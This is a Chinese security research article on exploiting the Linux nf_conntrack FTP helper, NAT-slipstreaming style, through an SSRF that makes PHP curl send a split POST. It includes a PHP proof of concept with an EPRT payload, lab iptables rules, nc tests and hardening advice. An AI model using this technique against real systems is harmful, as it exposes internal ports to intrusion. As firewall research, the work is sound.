作者:漂亮鼠
原文链接:https://mp.weixin.qq.com/s/KPHU8D_bC_zjD5LmyDWL_g
去年看了portswigger的top-10-web-hacking-techniques-of-2020-nominations-open文章,里面列举了2020年比较热门的技术,非常有意思,地址是(https://portswigger.net/research/top-10-web-hacking-techniques-of-2020-nominations-open)。在一系列前沿技巧中我看到了这篇(https://samy.pl/slipstream/)
NAT我知道,就是动态网络地址转换端口映射啥的嘛,防火墙隔绝内外网的基本功能之一。slipstreaming是什么玩意?
好屌啊,nat低压气穴,那我这么中二肯定要看看的。第一遍初看,没看懂,只知道从外网把受nat保护的内网端口给暴露出来了,第二遍第三遍也大概看懂了一个流程,没有深究,一直拖到现在重新研究。最近实在不知道干嘛了,前几天又和rr提了一嘴,那rr毕竟牛逼啊,经过rr的指点我可不得直接深入研究,于是有了下文。
由于比较复杂,概念太多我自己也没有特别搞得懂,我这边先罗列几篇背景知识文章供读者先看看,就不在赘述了。nat slipstream作者的官网:https://samy.pl/slipstream/ 奇安信攻防社区也有发过简单介绍这块的文章:https://forum.butian.net/share/88 github上2009年的文章:https://github.com/rtsisyk/linux-iptables-contrack-exploit 主要模块nf_conntrack的扫盲贴:https://clodfisher.github.io/2018/09/nf_conntrack/
我知道很多人都不会看,所以我大概简单介绍一下好了。首先,在典型的防火墙iptables里有一个很常见的配置
sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPTsudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
可以认为是放行input方向标记为ESTABLISHED状态的tcp链接,这种配置甚至在ubuntu官网都能找到(https://help.ubuntu.com/community/IptablesHowTo)
这也说明了这两条配置的常见性和广泛性,ESTABLISHED我们应该都能理解,就是tcp链接已经建立后的状态,已经建立完成的链接自然是可以从input方向进来的,这种链接常见于从内向外发起后的tcp链接。那么这里还有一个RELATED状态是什么呢?这个状态主要是给ALG类协议使用的,通常ALG类协议会有两个工作端口(典型如FTP),一个端口负责控制一个端口负责操作其他,而RELATED状态就是标记ALG类协议的两条TCP链接之间存在关联性,也就是说如果有一条TCP链接被标记为和另外一条相关联,那么他就可以从外部直接访问到内部。关于ALG的wiki解释如下:
下面还有一个比较详细的表来描述这个东西
关于利用ALG类协议在NAT上任意映射端口使外部发起的链接可以直接访问内部的端口,这一块的利用可以追溯到2010年之前,可以说是历史悠久。nat slipstream的作者在最新的文章里利用的是SIP协议,当然在很多年前他也利用过FTP。这里简单叙述一下SIP的利用思路:
我不像作者那样利用SIP,因为我觉得不太好找支持SIP的(感觉),所以回到远古的FTP上来。为了了解iptables对FTP的检测逻辑,我翻了很多资料,就不展开讲了。直接给出答案即可。我们先来了解一下FTP的ALG支持的必须条件:
nf_xxx是Linux内核模块,对链接的状态标记是由内核模块完成的,所以我们必须先知道系统有没有默认加载模块。比如下面是ubuntu20
可以看到已经把nf_conntrack_ftp默认去掉了,所以ftp的ALG默认是不支持的。而老一些Linux系统一般都会默认加载,比如
当然也不见得新的系统就一定不会有,要知道ubuntu20是桌面系统没有默认加载是正常的,而大部分防火墙不仅仅系统可能较老,而且出于功能性考虑肯定也会大概率加载,所以非常普遍可以认为基本都有。关于FTP的主动被动模式我就不介绍了,一点不了解的可以简单看看(https://www.cnblogs.com/mawanglin2008/articles/3607767.html)。了解这些前提后,我们来了解一下FTP的一般命令,这里主要看主动模式:
USER adminPASS adminPORT 127,0,0,1,0,22
一目了然不做过多介绍,这里主要看port这个命令,这个命令由客户端发出,通过防火墙后防火墙会记录下来,然后进行前面说的映射。这里我直接用奇安信社区的一篇文章的图来描述这个过程:
port指令前面四位是ip一看便知,后面两位其实是端口号的高位和低位,举个例子,比如端口号8848要获得其高低位,先转化成十六进制变为0x2290,然后获得高位0x22和低位0x90,再分别转成十进制最终得到34,144。这样如果我们要映射127.0.0.1上的8848就写成PORT 127,0,0,1,34,144
即可。我知道这很麻烦,也不直观,所以我现在介绍一个和他等效的命令来代替他:
EPRT |1|127.0.0.1|8848|
这个可以认为作为payload是和port等效的即可。一目了然也便于反复修改做实验。
大概概念雏形有了,我们整理一下:
当然这只是雏形,实际情况要比这个复杂很多,我们一步步来。第一步最容易想到的场景就是SSRF,还有投递恶意页面。这里我主要以SSRF作为先决条件,那么假设我有一个SSRF漏洞可以让我从内部发起请求到外部。接下来的核心问题就是防火墙的匹配逻辑和我的SSRF限制条件之间的场景磨合问题。如果防火墙的匹配规则比较弱智,那么我的SSRF限制条件越多对我来说场景越普遍,因为通常我们获得的SSRF可能就只有一个限定协议的GET请求。结合nf_conntrack_ftp的匹配逻辑的部分代码以及实验,我得出了几个隐藏的条件:
什么叫一个链接里必须拆分成两次请求呢?我们都知道有个东西叫做长链接,多个http请求可以在一个tcp长链接里进行请求和响应,那么这里可以类比成这个,只不过不一定是http。更具体的说如下图:
两次包的tcp flag的push位置必须置为1才算一次,两个push才算两次。这里也尝试过前面那个作者的tcp分片,尝试了对http报文使用tcp分片来达到分包效果,然而似乎防火墙并不吃这一套。
上图就是tcp分片的实验截图,并没有用,各位可以自己抓包看一下tcp分片的两个包第一个包并没有标记push所以两个分片被视为一个包。由于HTTP分包不能用,如果需要满足上面列举的几个条件在常见的SSRF协议里几乎很难做到。我分别尝试了以下几个方案:
在瞎几把尝试的时候,我使用了一个命令来模拟http发包:
curl -X POST -T x.txt http://xxx.xxx.xxx.xxx:21
结果居然成功了,一开始我以为是分片成功了,后来仔细看抓包感觉不太对劲
(这个截图我没有用分片所以没有看到分片的包)注意看划线的部分,可以看到一个post被拆分成两个请求报体,我们看一下是不是push位置都是1
确实都是1,太神奇了,这是怎么回事呢?我仔细看了看报文,发现post请求头里有这个
Expect: 100-continue
这是什么?百度一下(https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Status/100)
意思就是客户端先发出头部体暂时不发送post body,头部里加入Expect,如果服务器响应说我现在准备好接受post body了,然后客户端再单独发送post body。这就直接造成了两次push在一次tcp链接里!完美契合我们的需求!希望有了,可是问题又来了,哪个服务端在实现SSRF的时候会使用
curl -X POST -T x.txt http://xxx.xxx.xxx.xxx:21
这样的形式来发送呢?怕是脑残才会这样写吧。那这玩意真的就没有地方用吗?答案是有的!远在天边,近在眼前!我们看一下php的curl的实现,搜一搜找到下面的线索:https://gist.github.com/perusio/1724301
什么?php的curl在发送post体超过1024个字节的时候会使用expect?????我爱php!马上验证尝试,结果是自然的,有一说一,确实是这样的。那么我们开始构造一个满足要求的post体:
<?phpfor ($i=0; $i < 1; $i++) {echo "$i";request("http://172.28.64.142:21");}function request($url){ $requestData = "EPRT |1|172.28.64.19|8848|\r\n\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $requestData); $data = curl_exec($ch); curl_close($ch);}?>
好了,现在我们能发出被防火墙识别到触发映射规则的http报文了。
这里我建议先准备两个虚拟机,一台模拟外网主机,一台模拟内部主机,然后在内部主机上配上防火墙策略
sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPTsudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPTsudo iptables -P INPUT DROP
然后我们在内网的主机里执行前面的php文件模拟对外发包,发包到我们的外网服务端上(外部服务端要怎么写我就不放出来了,有一些小细节留给大家自己写吧)。在发包之前,我们可以在内网的主机上监听任意一个端口
nc -l 0.0.0.0:10000
接着在外网的主机上尝试去直接链接
nc -vv xxxxx 10000
会发现怎么都连不上,连不上才是正常的。接着开启发包,发送一个post请求,接着再次在外部主机上尝试链接,会发现连接成功!
这里有个细节就是一次连接成功后断开再次尝试的时候会发现又连不上了,这才是正常的。一个发包只能映射一次。
前面只是演示了一个可能的场景,但其实还可以延伸出其他可能的场景。比如:
其实我觉得不太好防御,最暴力的方式就是直接干掉related状态,一般情况下是用不到的,尤其是在一些比较严格的网络环境下自然是用不到的。用到的地方通常是比较随意的、便利为主的网络环境,所以在配置这个状态规则时还是要分清楚实际场景需要,而不是抄文档。另外下面是我找到的关于这一块的安全加固的文章,也可以参考一下 https://home.regit.org/netfilter-en/secure-use-of-helpers/
由于涉及到的知识太多,我直接压缩了很多内容的描述,也压缩了很多细节的推到,我觉得大家真的有兴趣最好自己试一下体会一下,多用wireshark抓包观察一下。这篇文章不是终点,只是一个起点,nat slipstream也只是个起点,贴合实际泛化后,我相信会有更多的潜在场景被挖掘出来。有兴趣一起研究一起学习的小伙伴可以加入我的知识星球,我会在知识星球里发更多细节以及其他有趣的文章,公众号的文章只是冰山一角。
本文由 Seebug Paper 发布,如需转载请注明来源。本文地址:https://paper.seebug.org/1716/